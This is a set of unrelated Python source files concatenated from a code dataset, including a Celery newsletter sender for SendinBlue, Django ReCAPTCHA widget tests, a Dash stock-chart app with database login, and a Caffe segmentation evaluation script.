        seed: Randomization seed forwarded to Newsletter.export().
        preferred_reco: Recommendation to prioritize (may be None).
        remove_reco: Recommendations to exclude.
        only_to: Optional recipient filter.
        force_send (bool): Forwarded to import_() to send despite missing data.

    Returns:
        dict: The result dict from import_() with 'progress' forced to 100.
    """
    task.update_state(
        state='STARTED',
        meta={
            "progress": 0,
            "details": "Prise en compte de la désincription des membres"
        }
    )
    deactivate_contacts()
    task.update_state(
        state='STARTED',
        meta={
            "progress": 0,
            "details": "Suppression des anciennes listes"
        }
    )
    # Remove previously-created SIB mailing lists before building new ones.
    list_ids_to_delete = get_lists_ids_to_delete()
    contacts_api = sib_api_v3_sdk.ContactsApi(sib)
    for i, list_id in enumerate(list_ids_to_delete, 1):
        contacts_api.delete_list(list_id)
        task.update_state(
            state='STARTED',
            meta={
                "progress": 0,
                "details": f"Suppression des anciennes listes ({i}/{len(list_ids_to_delete)})"
            }
        )
    task.update_state(
        state='STARTED',
        meta={
            "progress": 0,
            "details": "Constitution de la liste"
        }
    )
    # Materialize all newsletters to send as DB-backed objects.
    newsletters = list(
        map(
            NewsletterDB,
            Newsletter.export(
                preferred_reco=preferred_reco,
                user_seed=seed,
                remove_reco=remove_reco,
                only_to=only_to
            )
        )
    )
    # Only persist in production; other envs run the pipeline dry.
    if current_app.config['ENV'] == 'production':
        db.session.add_all(newsletters)
        db.session.commit()
    task.update_state(
        state='STARTED',
        meta={
            "progress": 0,
            "details": "Construction des listes SIB d'envoi"
        }
    )
    # overhead=2 accounts for the extra API requests made outside import_().
    result = import_(task, newsletters, force_send, 2)
    result['progress'] = 100
    if current_app.config['ENV'] == 'production':
        db.session.commit()
    return result
def send(campaign_id, test=False):
    """Trigger immediate sending of a SendinBlue email campaign.

    No-op outside production unless *test* is set.
    """
    if current_app.config['ENV'] == 'production' or test:
        send_email_api = sib_api_v3_sdk.EmailCampaignsApi(sib)
        send_email_api.send_email_campaign_now(campaign_id=campaign_id)
def import_(task, newsletters, force_send=False, overhead=0, test=False, mail_list_id=None):
    """Upload newsletter recipients to a SendinBlue list and start the
    asynchronous contact import (SIB calls back notify_url when done).

    Args:
        task: Celery task for progress reporting (may be None).
        newsletters: NewsletterDB instances to send.
        force_send (bool): Send even when air-quality data is missing.
        overhead (int): Extra request count for progress estimation.
        test (bool): Run SIB calls outside production (test folder/list).
        mail_list_id: Reuse an existing SIB list instead of creating one.

    Returns:
        dict: state/progress/details plus the per-newsletter `errors` list.
    """
    # NOTE(review): indentation below is reconstructed from a
    # whitespace-stripped dump; nesting of the production-only branches
    # matches the apparent intent — confirm against upstream.
    mail_list_id_set = mail_list_id is not None
    errors = []
    now = datetime.now()
    total_nb_requests = 4 + len(newsletters) + overhead
    nb_requests = 0
    if mail_list_id == None:  # NOTE(review): `is None` would be idiomatic
        # Create a fresh dated mailing list in the configured SIB folder.
        lists_api = sib_api_v3_sdk.ListsApi(sib)
        r = lists_api.create_list(
            sib_api_v3_sdk.CreateList(
                name=f'{now} - mail',
                folder_id=int(os.getenv('SIB_FOLDERID', 5)) if not test else int(os.getenv('SIB_FOLDERID', 1653))
            )
        )
        mail_list_id = r.id
        nb_requests += 1
        if task:
            task.update_state(
                state='STARTED',
                meta={
                    "progress": (nb_requests/total_nb_requests)*100,
                    "details": f"Création de la liste"
                }
            )
    for i, nl in enumerate(newsletters):
        # Record (and skip) newsletters with nothing sendable.
        if nl.label is None and not force_send:
            errors.append({
                "type": "no_air_quality",
                "nl_id": nl.id,
                "region": nl.inscription.commune.departement.region.nom,
                "ville": nl.inscription.commune.nom,
                "insee": nl.inscription.commune.insee
            })
            current_app.logger.error(f"No qai for {nl.inscription.mail}")
        elif not nl.something_to_show and force_send:
            errors.append({
                "type": "nothing_to_show",
                "nl_id": nl.id,
                "region": nl.inscription.commune.departement.region.nom,
                "ville": nl.inscription.commune.nom,
                "insee": nl.inscription.commune.insee
            })
            current_app.logger.error(f"Nothing to show for {nl.inscription.mail}")
        else:
            if current_app.config['ENV'] == 'production' and not mail_list_id_set:
                nl.mail_list_id = mail_list_id
                db.session.add(nl)
                # Commit in batches of 100 to bound transaction size.
                if i % 100 == 0:
                    db.session.commit()
    if current_app.config['ENV'] == 'production' or test:
        db.session.commit()
        # Kick off the async SIB import; SIB fetches file_url itself and
        # POSTs to notify_url when the import completes.
        contact_api = sib_api_v3_sdk.ContactsApi(sib)
        request_contact_import = sib_api_v3_sdk.RequestContactImport()
        request_contact_import.list_ids = [mail_list_id]
        request_contact_import.email_blacklist = False
        request_contact_import.sms_blacklist = False
        request_contact_import.update_existing_contacts = True
        request_contact_import.empty_contacts_attributes = True
        request_contact_import.file_url = url_for(
            'newsletter.export',
            secret_slug=os.getenv("CAPABILITY_ADMIN_TOKEN"),
            mail_list_id=mail_list_id,
            _external=True,
            _scheme='https'
        )
        request_contact_import.notify_url = url_for(
            'newsletter.send_campaign',
            secret_slug=os.getenv("CAPABILITY_ADMIN_TOKEN"),
            now=now,
            mail_list_id=mail_list_id,
            _external=True,
            _scheme='https'
        )
        current_app.logger.debug("About to send newsletter with params")
        current_app.logger.debug(request_contact_import)
        try:
            contact_api.import_contacts(request_contact_import)
            current_app.logger.debug("Newsletter sent")
        except ApiException as e:
            current_app.logger.error("Exception when calling ContactsApi->import_contacts: %s\n" % e)
    return {
        "state": "STARTED",
        "progress": (nb_requests/total_nb_requests)*100,
        "details": "Terminé",
        "errors": errors
    }
def create_campaign(now, mail_list_id, test=False):
    """Create a SendinBlue email campaign from the configured template,
    targeting *mail_list_id*.

    Returns the new campaign's id, or 0 outside production (unless *test*).
    """
    if current_app.config['ENV'] == 'production' or test:
        template_id = int(os.getenv('SIB_EMAIL_TEMPLATE_ID', 526))
        email_campaign_api = sib_api_v3_sdk.EmailCampaignsApi(sib)
        transactional_api = sib_api_v3_sdk.TransactionalEmailsApi(sib)
        # Reuse the transactional template's sender and subject.
        template = transactional_api.get_smtp_template(int(template_id))
        r = email_campaign_api.create_email_campaign(
            sib_api_v3_sdk.CreateEmailCampaign(
                sender=sib_api_v3_sdk.CreateEmailCampaignSender(
                    email=template.sender.email,
                    name=template.sender.name
                ),
                name=f'{now}',
                template_id=template_id,
                subject=template.subject,
                reply_to="<EMAIL>",
                recipients=sib_api_v3_sdk.CreateEmailCampaignRecipients(
                    list_ids=[mail_list_id]
                ),
                header="Aujourd'hui, la qualité de l'air autour de chez vous est…",
                tag='newsletter' if not test else 'test_newsletter'
            )
        )
        email_campaign_id = r.id
    else:
        email_campaign_id = 0
    return email_campaign_id
def format_errors(errors):
    """Render the newsletter error list as a human-readable French report.

    The report contains, in order: one detail line per error, a blank line,
    one summary line per region (insertion order), a blank line, then a
    CSV-style line per error. Returns '' when there are no errors.
    """
    if not errors:
        return ''

    type_labels = {
        "no_air_quality": "Pas de qualité de l’air",
        "nothing_to_show": "Aucune donnée à montrer"
    }

    detail_lines = []
    csv_lines = []
    per_region = {}
    for error in errors:
        label = type_labels.get(error['type'], error['type'])
        detail_lines.append(
            f"{label} pour la ville de {error['ville']} ({error['insee']}) région: '{error['region']}'\n"
        )
        csv_lines.append(f"{error['ville']}, {error['insee']}, {error['region']}\n")
        # Plain dict counting keeps first-seen region order, like the
        # setdefault-based original.
        per_region[error['region']] = per_region.get(error['region'], 0) + 1

    summary_lines = [
        f'La région {region} a eu {count} erreurs\n'
        for region, count in per_region.items()
    ]

    return ''.join(detail_lines) + '\n' + ''.join(summary_lines) + '\n' + ''.join(csv_lines)
@celery.task(bind=True)
def import_send_and_report(self, only_to=None, force_send=False, report=False):
    """Celery task: import contacts, send the newsletter, optionally mail a report.

    Args:
        only_to: optional recipient filter forwarded to import_and_send.
        force_send: forwarded to import_and_send to bypass its send guards.
        report: when True, email a summary of the errors encountered.

    Returns:
        The result dict produced by import_and_send.
    """
    # NOTE(review): informational message logged at ERROR level — confirm intent.
    current_app.logger.error("Début !")
    new_task_id = str(uuid4())
    self.update_state(
        state='STARTED',
        meta={
            "progress": 0,
            "details": f"Lancement de la tache: '{new_task_id}'",
        }
    )
    # Bug fix: a second uuid4() used to be generated here, so the task id
    # announced in the STARTED state never matched the one actually used.
    result = import_and_send(self, new_task_id, None, [], only_to, force_send)
    if report:
        errors = format_errors(result['errors'])
        body = """
Bonjour,
Il n’y a pas eu d’erreur lors de l’envoi de la newsletter
Bonne journée !
""" if not errors else f"""
Bonjour,
Il y a eu des erreurs lors de l’envoi de la newsletter :
{errors}
Bonne journée
"""
        send_log_mail("Rapport d’envoi de la newsletter", body, name="Rapport recosante", email="<EMAIL>")
    self.update_state(
        # Bug fix: previously misspelled 'SUCESS', which Celery treats as a
        # custom state — AsyncResult.successful() would never return True.
        state='SUCCESS',
        meta={
            "progress": 100,
            "details": "Fin",
        }
    )
    return result
def get_lists_ids_to_delete():
    """Return the ids of Sendinblue contact lists, paginated 10 at a time.

    NOTE(review): pagination starts at offset 10, so the first page of
    lists is never included — presumably the ten most recent lists must
    survive deletion; confirm against the caller before changing.
    """
    api_instance = sib_api_v3_sdk.ContactsApi(sib)
    # Start past the first page (see the note in the docstring).
    offset = 10
    api_response = api_instance.get_lists(limit=10, offset=offset)
    ids = []
    while True:
        # NOTE(review): ids are collected before the emptiness check; if the
        # API ever returns None instead of [] this comprehension will raise.
        ids = ids + [r['id'] for r in api_response.lists]
        if not api_response.lists:
            break
        offset += 10
        api_response = api_instance.get_lists(limit=10, offset=offset)
    return ids | StarcoderdataPython |
3328005 | <filename>tests/captcha/test_widgets.py<gh_stars>10-100
from unittest import TestCase
from django.utils.safestring import SafeData
from antispam.captcha.widgets import ReCAPTCHA, InvisibleReCAPTCHA
class ReCAPTCHATests(TestCase):
    """Behaviour of the standard (checkbox) ReCAPTCHA widget."""

    def setUp(self):
        self.widget = ReCAPTCHA(sitekey='mysitekey')

    def test_render_return_html(self):
        """render() must produce a safe (pre-escaped) string."""
        rendered = self.widget.render('captcha', '1234')
        self.assertIsInstance(rendered, SafeData)

    def test_render(self):
        """The rendered markup carries the g-recaptcha hook class."""
        rendered = self.widget.render('captcha', '1234')
        self.assertIn('g-recaptcha', rendered)

    def test_get_value_from_datadict(self):
        """The widget reads Google's fixed POST key, not its own name."""
        posted = {'g-recaptcha-response': 'my-response'}
        extracted = self.widget.value_from_datadict(posted, {}, 'recaptcha')
        self.assertEqual('my-response', extracted)
class InvisibleReCAPTCHATests(ReCAPTCHATests):
    """Re-runs every ReCAPTCHATests case against the invisible widget.

    Only setUp is overridden; all inherited test methods exercise the
    InvisibleReCAPTCHA instance created here.
    """

    def setUp(self):
        self.widget = InvisibleReCAPTCHA(sitekey='mysitekey')
| StarcoderdataPython |
113940 | from __future__ import absolute_import, division, print_function
from dxtbx_format_image_ext import * # noqa: F403
# Explicit public API of this package: the names below are re-exported from
# the compiled dxtbx_format_image_ext extension pulled in by the star import
# above; listing them documents what the extension provides.
__all__ = (  # noqa: F405
    "CBFFastImageListReader",
    "CBFFastReader",
    "CBFImageListReader",
    "CBFReader",
    "HDF5Reader",
    "ImageBool",
    "ImageBuffer",
    "ImageDouble",
    "ImageInt",
    "ImageReader",
    "ImageTileBool",
    "ImageTileDouble",
    "ImageTileInt",
    "SMVImageListReader",
    "SMVReader",
    "TIFFImageListReader",
    "TIFFReader",
)
| StarcoderdataPython |
193737 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from . import hr
from . import res_config_settings
from . import mail_alias
from . import mail_channel
from . import res_partner
from . import res_users
| StarcoderdataPython |
71523 | #Module Import
from config import *
# Open the module-level Postgres connection/cursor shared by all callbacks.
try:
    conn = psycopg2.connect(
        host="postgres",
        database="production",
        user="postgres1",
        password="<PASSWORD>")
    cur = conn.cursor()
except Exception as e:
    # Best-effort startup: the app continues without a DB connection, but
    # note that `conn`/`cur` stay undefined on failure, so any callback
    # that touches them will raise NameError.
    print('Not Connected: ' +str(e))
    pass
#Callbacks
##Login callbacks
@app.callback(
    Output("Login_modal", "is_open"),
    [Input("Login", "n_clicks"), Input("close", "n_clicks")],
    [State("Login_modal", "is_open")],
)
def toggle_login_modal(n1, n2, is_open):
    """Flip the login modal whenever either trigger button has been clicked."""
    if not (n1 or n2):
        return is_open
    return not is_open
@app.callback(
    Output("loggedInStatusSuccess", "children"),
    Output("loggedInStatus", "children"),
    Output("favouritesDropdown","options"),
    Output("login_email","value"),
    Output("login_pw","value"),
    [Input("loginButton", "n_clicks")],
    [dash.dependencies.State("login_email", "value"),
     dash.dependencies.State("login_pw", "value")],
)
def loginAccount(n_clicks, email, password):
    """Authenticate the user and load their favourite tickers.

    Returns a 5-tuple: (status detail, status summary, dropdown options,
    cleared email field, cleared password field). An initial fire with
    n_clicks=None falls into the except branch via the TypeError, as before.
    """
    try:
        if (n_clicks > 0):
            cur = conn.cursor()
            # SECURITY(review): base64 is reversible encoding, not hashing —
            # passwords are effectively stored in clear. Kept only for
            # compatibility with existing rows; should move to a real KDF.
            encryptedLoginPassword = base64.b64encode(password.encode("utf-8")).decode("utf-8")
            # Security fix: parameterized query — the previous str.format()
            # version was vulnerable to SQL injection through the email field.
            cur.execute("SELECT password from public.users WHERE username = %s;", (email,))
            result = cur.fetchone()
            if str(result[0]) == str(encryptedLoginPassword):
                favourites = []
                session['username'] = email
                cur.execute(
                    "SELECT ticker from public.userFavourites uF "
                    "inner join users u on u.userId = uF.userId WHERE u.username = %s;",
                    (session['username'],))
                result = cur.fetchall()
                for ticker in result:
                    favourites.append(str(ticker[0]))
                return ('Login successful ' + str(session['username']) + ', you may exit the modal',
                        'Logged in as ' + str(email),
                        [{'label': str(i), 'value': str(i)} for i in favourites],
                        '', '')
            else:
                cur.execute("rollback;")
                return ('Authentication failed: Please check username/password',
                        'Login failed (please try again)',
                        [{'label': 'SPY', 'value': 'SPY'}], '', '')
    except Exception as e:
        cur.execute("rollback;")
        # Bug fix: this branch used {'key': ...}; Dash dropdown options need
        # 'label'/'value' pairs, so the fallback option never rendered.
        return ('Error: ' + str(e), 'Login failed (please try again)',
                [{'label': 'SPY', 'value': 'SPY'}], '', '')
##Register Callbacks
@app.callback(
    Output("Register_modal", "is_open"),
    [Input("Register", "n_clicks"), Input("close_register", "n_clicks")],
    [State("Register_modal", "is_open")],
)
def toggle_register_modal(n1, n2, is_open):
    """Flip the register modal whenever either trigger button has been clicked."""
    return (not is_open) if (n1 or n2) else is_open
@app.callback(
    Output("registeredStatus", "children"),
    [Input("registerButton", "n_clicks")],
    [dash.dependencies.State("registerEmail", "value"),
     dash.dependencies.State("register_pw", "value")],
)
def registerAccount(n_clicks, email, password):
    """Insert a new user row and echo back the stored username."""
    try:
        if (n_clicks > 0):
            # SECURITY(review): base64 is reversible encoding, not hashing;
            # kept only so the login comparison above still matches.
            encryptedPassword = base64.b64encode(password.encode("utf-8")).decode("utf-8")
            currentDateTime = datetime.now()
            # Security fix: parameterized statements — the previous
            # str.format() versions were open to SQL injection via the
            # email and password fields.
            cur.execute(
                "INSERT INTO public.users(username,password,dateCreated) VALUES(%s,%s,%s);",
                (email, encryptedPassword, str(currentDateTime)))
            # NOTE(review): no conn.commit() here — relies on autocommit
            # being enabled on the connection; confirm the settings.
            cur.execute("SELECT username FROM public.users WHERE username = %s ;", (email,))
            result = cur.fetchone()
            return 'Registered: ' + str(result)
    except Exception as e:
        cur.execute("rollback;")
        return 'Error: '+ str(e)
#Add to favourites
@app.callback(
    Output("favouritesOutPut", "children"),
    [Input("addToFavourites", "n_clicks")],
    [dash.dependencies.State("stock_ticker", "value")])
def addChartToFavourites(n_clicks, value):
    """Store the currently selected ticker as a favourite of the session user."""
    if (n_clicks):
        try:
            if session.get('username') is not None:
                try:
                    # Security fix: parameterized queries — the previous
                    # str.format() calls allowed SQL injection through the
                    # session username and the ticker value.
                    cur.execute("SELECT userId FROM public.users WHERE username = %s ;",
                                (session['username'],))
                    result = cur.fetchone()
                    cur.execute("INSERT INTO public.userFavourites(userId,ticker) VALUES(%s,%s);",
                                (result[0], str(value)))
                    return 'Added {} to your favourites'.format(value)
                except Exception as e:
                    # NOTE(review): no rollback here, unlike the other DB
                    # callbacks — a failed INSERT may poison the transaction.
                    return 'Error: '+ str(e)
            elif session.get('username') is None:
                return 'User not logged in'
        except Exception as e:
            return 'Error: '+ str(e)
#Favourites Callback
@app.callback(
    Output("stock_ticker", "value"),
    [Input("favouritesDropdown", "value")])
def generate_chartFromFavourites(value):
    """Copy the favourite chosen in the dropdown into the ticker input.

    Bug fix: the previous except branch returned a 2-tuple for a callback
    with a single Output, which Dash cannot map; the try/except was also
    unreachable since the body could not raise. Exactly one value is
    returned now: the selection, or '' when nothing is selected.
    """
    return value or ''
###Main chart generation
@app.callback(
    Output("chartmain", "children"),
    Output("fundamentals", "children"),
    [Input("Generate", "n_clicks")],
    [dash.dependencies.State('dateTimePicker', 'start_date'),
     dash.dependencies.State('dateTimePicker', 'end_date'),
     dash.dependencies.State('dropdownIntervals', 'value'),
     dash.dependencies.State("stock_ticker", "value")])
def generate_chart(n_clicks, start_date, end_date, interval, value):
    """Build the main price chart and the fundamentals table for a ticker.

    Returns (chart children, fundamentals children) on success, or a pair
    of error strings on failure.

    NOTE(review): when n_clicks is None or 0 the function falls through and
    implicitly returns None for both Outputs — confirm this is the intended
    initial-load behaviour. `n_clicks is None` would be the idiomatic test.
    """
    if n_clicks == None:
        n_clicks = 0
    elif (n_clicks > 0):
        try:
            if start_date == end_date:
                # Same-day request: push the end forward 24h so Yahoo
                # returns at least one day of data.
                end_date = datetime.strptime(end_date, '%Y-%m-%d')+timedelta(hours=24)
                df = pdr.get_data_yahoo(value, start=start_date, end=end_date ,interval=interval)
                fig = px.line(data_frame=df, x=df.index, y='Close')
            else:
                df = pdr.get_data_yahoo(value, start=start_date, end=end_date, interval=interval)
                fig = px.line(data_frame=df, x=df.index, y='Close')
            fig.update_layout(title ={'text' :'Stock Value of ' + value +':' + start_date + ' to ' + end_date, 'y': 0.9, 'x':0.5,'xanchor':'center','yanchor':'top'},
                              xaxis_title='Interval: ' + interval,
                              yaxis_title='Stock Doller Value',
                              title_font_family = "Roboto",
                              titlefont = {"size": 18})
            # Export controls: the price dataframe is embedded in the page
            # as a CSV data URI for the download link below.
            dataExportcsv = df.to_csv(index=False,encoding='utf-8')
            dataExportdfcsv = "data:text/csv;charset=utf-8," + urllib.parse.quote(dataExportcsv)
            # Fundamentals: one-row table built from the ticker's info dict
            # (the long business summary column is dropped).
            df = pd.DataFrame.from_dict([yf.Ticker(value).info])
            del df['longBusinessSummary']
            data = df.to_dict('rows')
            columns = [{"name": i, "id": i,} for i in (df.columns)]
            chartMainGraph = dcc.Graph(figure=fig)
            chartMainFundamentals = [dash_table.DataTable(id='fundamentalsTable',
                                                          data=data, columns=columns,
                                                          editable=False,
                                                          sort_action="native",
                                                          sort_mode="multi",
                                                          row_selectable="multi",
                                                          style_table={
                                                              'maxHeight': '50ex',
                                                              'overflowY': 'scroll',
                                                              'width': '100%',
                                                              'minWidth': '100%',
                                                          },
                                                          # style cell
                                                          style_cell={
                                                              'fontFamily': 'Open Sans',
                                                              'textAlign': 'center',
                                                              'height': '60px',
                                                              'padding': '2px 22px',
                                                              'whiteSpace': 'inherit',
                                                              'overflow': 'hidden',
                                                              'textOverflow': 'ellipsis',
                                                          },
                                                          style_cell_conditional=[
                                                              {
                                                                  'if': {'column_id': 'State'},
                                                                  'textAlign': 'left'
                                                              },
                                                          ],
                                                          style_header={
                                                              'fontWeight': 'bold',
                                                              'backgroundColor': 'white',
                                                          },
                                                          style_data_conditional=[
                                                              {
                                                                  # stripped rows
                                                                  'if': {'row_index': 'odd'},
                                                                  'backgroundColor': 'rgb(248, 248, 248)'
                                                              },
                                                              {
                                                                  # highlight one row
                                                                  'if': {'row_index': 4},
                                                                  "backgroundColor": "#3D9970",
                                                                  'color': 'white'
                                                              }
                                                          ]
                                                          )
                                     ]
            return [html.A('Export Data', id="exportData",download="{}-data-for_{}_to_{}.csv".format(value,start_date,end_date), href=str(dataExportdfcsv),target="_blank"),
                    chartMainGraph], chartMainFundamentals
        except Exception as e:
            return 'Error: '+ str(e), 'No Fundamentals'
| StarcoderdataPython |
3317113 | from __future__ import print_function
from __future__ import division
import findcaffe
import caffe
import os, argparse
import os.path as osp
import numpy as np
import scipy.ndimage as nd
import pylab, png, pickle
from shutil import copyfile
from ipdb import set_trace
import matplotlib.pyplot as plt
plt.switch_backend('agg')
import matplotlib.colors as mpl_colors
import cv2
# 22-entry colour table as RGB fractions, and the discrete matplotlib
# colormap built from it. Presumably the 21 Pascal-VOC segmentation
# classes plus one extra highlight colour (index 21 is written into the
# label/pred maps by the commented-out drawing code below) — confirm.
palette = [(0.0, 0.0, 0.0), (0.5, 0.0, 0.0), (0.0, 0.5, 0.0), (0.5, 0.5, 0.0),
           (0.0, 0.0, 0.5), (0.5, 0.0, 0.5), (0.0, 0.5, 0.5), (0.5, 0.5, 0.5),
           (0.25, 0.0, 0.0), (0.75, 0.0, 0.0), (0.25, 0.5, 0.0), (0.75, 0.5, 0.0),
           (0.25, 0.0, 0.5), (0.75, 0.0, 0.5), (0.25, 0.5, 0.5), (0.75, 0.5, 0.5),
           (0.0, 0.25, 0.0), (0.5, 0.25, 0.0), (0.0, 0.75, 0.0), (0.5, 0.75, 0.0),
           (0.0, 0.25, 0.5), (0.75, 0.75, 0.75)]
my_cmap = mpl_colors.LinearSegmentedColormap.from_list('Custom cmap', palette, 22)
def parse_args():
    """Parse the command-line options; every path option defaults to None."""
    parser = argparse.ArgumentParser()
    for option in ("--net_file", "--weight_file", "--list_file", "--save_path"):
        parser.add_argument(option, default=None, type=str)
    return parser.parse_args()
def preprocess(image, label, size, mean_pixel):
    """Resize an (H, W, 3) image and (H, W) label map to (size, size),
    mean-centre the image and add network batch/channel axes.

    Returns:
        image: array of shape (1, 3, size, size), channels-first, bilinearly
            resized with mean_pixel subtracted.
        label: array of shape (1, 1, size, size), nearest-neighbour resized.
    """
    zoom_y = size / float(image.shape[0])
    zoom_x = size / float(image.shape[1])
    # Bilinear for the image, nearest-neighbour for the (categorical) label.
    image = nd.zoom(image.astype('float32'), (zoom_y, zoom_x, 1.0), order=1)
    label = nd.zoom(label,
                    (size / float(label.shape[0]), size / float(label.shape[1])),
                    order=0)
    image = (image - mean_pixel).transpose([2, 0, 1])[np.newaxis, ...]
    label = label.reshape((1, 1, size, size))
    return image, label
class CaffeInfer(object):
    """Forwards a trained network over a list of (image, label) samples and
    records each image's seed/constrain losses to a pickle file."""

    def __init__(self, net_file, weight_file, gpu_id=0):
        caffe.set_device(gpu_id)
        caffe.set_mode_gpu()
        # Bug fix: the constructor previously ignored its net_file/weight_file
        # parameters and read the module-level `args` instead.
        # NOTE(review): caffe.TRAIN keeps the loss layers active during the
        # forward pass — presumably intentional for loss collection; confirm.
        self.net = caffe.Net(net_file, weight_file, caffe.TRAIN)

    def eval(self, list_file, save_viz_path, save_score_name):
        """Run the net over every "image label" pair listed in list_file and
        dump {image_stem: [seed_loss, constrain_loss]} to save_score_name.

        save_viz_path is only consumed by the commented-out drawing code.
        """
        # Fix: close the list file (previously left open).
        with open(list_file, "r") as fh:
            train_samples = [line.strip().split(" ") for line in fh.readlines()]
        mean_pixel = np.array([104.0, 117.0, 123.0])
        im_score = dict()
        for k, (im_name, label_name) in enumerate(train_samples):
            raw_im, raw_label = cv2.imread(im_name), cv2.imread(label_name, cv2.IMREAD_GRAYSCALE)
            im, label = preprocess(raw_im, raw_label, 321, mean_pixel)
            self.net.blobs['images'].data[...] = im
            self.net.blobs['labels'].data[...] = label
            self.net.forward()
            # Upsample the class scores back to the raw image resolution;
            # `pred` only feeds the commented-out visualisation below.
            score = np.squeeze(self.net.blobs['fc8_merge'].data[...])
            score = nd.zoom(score, (1, raw_im.shape[0] / score.shape[1], raw_im.shape[1] / score.shape[2]), order=1)
            pred = np.argmax(score, axis=0)
            loss_seed = self.net.blobs['loss-Seed'].data[...][0]
            loss_constrain = self.net.blobs['loss-Constrain'].data[...][0]
            # draw result
            # f = plt.figure(facecolor="white")
            # ax = f.add_subplot(2, 2, 1)
            # ax.imshow(raw_im[:, :, ::-1])
            # ax.axis("off")
            # raw_label[0, 0] = 21
            # ax = f.add_subplot(2, 2, 2)
            # ax.imshow(raw_label, cmap=my_cmap)
            # ax.axis("off")
            # pred[0, 0] = 21
            # ax = f.add_subplot(2, 2, 3)
            # ax.imshow(pred, cmap=my_cmap)
            # ax.axis("off")
            # gt_name = im_name.replace("JPEGImages", "SegmentationClassAug_color").replace("jpg", "png")
            # gt = cv2.imread(gt_name)
            # ax = f.add_subplot(2, 2, 4)
            # ax.imshow(gt[:, :, ::-1])
            # ax.axis("off")
            pure_name = im_name.split("/")[-1].split(".")[0]
            # title_str = "{:s}_{:.2f}_{:.2f}".format(pure_name, loss_seed, loss_constrain)
            # plt.suptitle(title_str)
            # plt.tight_layout()
            # plt.subplots_adjust(wspace=0.01, hspace=0.01)
            # plt.savefig(os.path.join(save_viz_path, pure_name + ".png"))
            # plt.close()
            im_score[pure_name] = [loss_seed, loss_constrain]
            print("finish {} files".format(k))
        # Fix: close the output file (previously left open).
        with open(save_score_name, "wb") as fh:
            pickle.dump(im_score, fh, pickle.HIGHEST_PROTOCOL)
def cmp(x, y):
    """Return 1 when x's first score is strictly below y's, else 0.

    Operates on (name, (seed_loss, constrain_loss)) items as produced by
    im_score.items(). NOTE(review): despite the name this is not a classic
    three-way comparator (it never returns -1), so it is only usable where
    a boolean-style result is expected.
    """
    return 1 if x[1][0] < y[1][0] else 0
if __name__ == "__main__":
    # NOTE(review): the parsed command-line values are immediately
    # overwritten with hard-coded experiment paths below, so the CLI
    # options are effectively ignored in this script.
    args = parse_args()
    root_path = "/data1/yaoqi/segmentation/weakly/wsss/dsrg/training/experiment/anti-noise/"
    args.net_file = osp.join(root_path, "config/deeplabv2_weakly_forward.prototxt")
    args.weight_file = osp.join(root_path, "model/model-sgan_iter_8000.caffemodel")
    args.list_file = osp.join(root_path, "list/train_aug_pt_0328_ratio15.txt")
    args.save_path = "training/visualize/eval_train"
    save_score_name = "training/visualize/im_score_6396.pkl"
    # infer im-score viz results if not exists
    # if not osp.exists(args.save_path):
    #     os.makedirs(args.save_path)
    # caffe_infer = CaffeInfer(args.net_file, args.weight_file)
    # caffe_infer.eval(args.list_file, args.save_path, save_score_name)
    # Load the previously computed per-image scores and order the samples
    # by ascending seed loss (smallest loss first).
    im_score = pickle.load(open(save_score_name, "rb"))
    sort_im_score = sorted(im_score.items(), key=lambda d: d[1][0])
    # top_loss_path = "visualize/top_100_loss"
    # least_loss_path = "visualize/least_100_loss"
    # if not osp.exists(top_loss_path):
    #     os.makedirs(top_loss_path)
    # if not osp.exists(least_loss_path):
    #     os.makedirs(least_loss_path)
    # for k in range(100):
    #     least_name = sort_im_score[k][0] + ".png"
    #     top_name = sort_im_score[-(k + 1)][0] + ".png"
    #     copyfile(osp.join(args.save_path, least_name), osp.join(least_loss_path, least_name))
    #     copyfile(osp.join(args.save_path, top_name), osp.join(top_loss_path, top_name))
    write_im_path = "/home/yaoqi/Dataset/VOC2012/JPEGImages/"
    write_gt_path = "/data1/yaoqi/home_segmentation/segmentation/weakly/DSRG/training/localization_cues/seed_0328_7440_5996/"
    # Emit a retraining list with the 10282 lowest-loss samples, one
    # "image_path label_path" pair per line (CRLF-terminated).
    with open("train_aug_pt_1012_retrain_10282.txt", "w") as f:
        for num, (k, v) in enumerate(sort_im_score):
            if num < 10282:
                f.write("{} {}\r\n".format(write_im_path + k + ".jpg", write_gt_path + k + ".png"))
    # sort_path = "visualize/sort_eval_train"
    # # set_trace()
    # if not osp.exists(sort_path):
    #     os.makedirs(sort_path)
    # for k, v in sort_im_score:
    #     save_im_name = "{:.3f}_{:s}".format(v[0], k)
    #     copyfile(osp.join(args.save_path, k + ".png"), osp.join(sort_path, save_im_name + ".png"))
| StarcoderdataPython |
1782620 | from ipyannotations import base
from unittest.mock import MagicMock
import ipywidgets
import pytest
# Canned DOM keyboard events fed to _handle_keystroke in the tests below.
ENTER_KEYUP = {"type": "keyup", "key": "Enter"}
ENTER_KEYDOWN = {"type": "keydown", "key": "Enter"}
# NOTE(review): despite the name, this is a "keyup" event — the handler in
# test_key_handling fires undo on it, so keyup appears to be what matters.
BACKSPACE_KEYDOWN = {"type": "keyup", "key": "Backspace"}
class TestWidget(base.LabellingWidgetMixin, ipywidgets.VBox):
    """
    Widget required as the mixin doesn't work if not also inheriting from VBox.

    No explicit constructor is needed: the previous __init__ only forwarded
    *args/**kwargs to super().__init__, which is exactly what the inherited
    constructor already does, so it has been removed.
    """
def test_error_on_passing_non_callable():
    """on_submit must reject values that cannot be called."""
    subject = TestWidget()
    with pytest.raises(ValueError):
        subject.on_submit(1)
def test_key_handling(mocker):
    """Enter keyup triggers the submission callbacks; Backspace triggers undo.

    NOTE(review): both callbacks are registered through on_submit here, so
    `undo_function` is called as a submission handler (with the data), not
    through an undo-registration API — confirm this matches the widget's
    intended contract.
    """
    widget = TestWidget()
    submission_function: MagicMock = mocker.MagicMock()
    undo_function: MagicMock = mocker.MagicMock()
    # Spy on the real undo method so its invocation can be asserted too.
    undo_spy: MagicMock = mocker.spy(widget, "undo")
    widget.on_submit(submission_function)
    widget.on_submit(undo_function)
    widget.data = "test data"
    # keydown alone must not submit…
    widget._handle_keystroke(ENTER_KEYDOWN)
    submission_function.assert_not_called()
    # …only the matching keyup does, passing the current data.
    widget._handle_keystroke(ENTER_KEYUP)
    submission_function.assert_called_with("test data")
    widget._handle_keystroke(BACKSPACE_KEYDOWN)
    undo_spy.assert_called_once()
    undo_function.assert_called_once()
| StarcoderdataPython |
1757110 | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
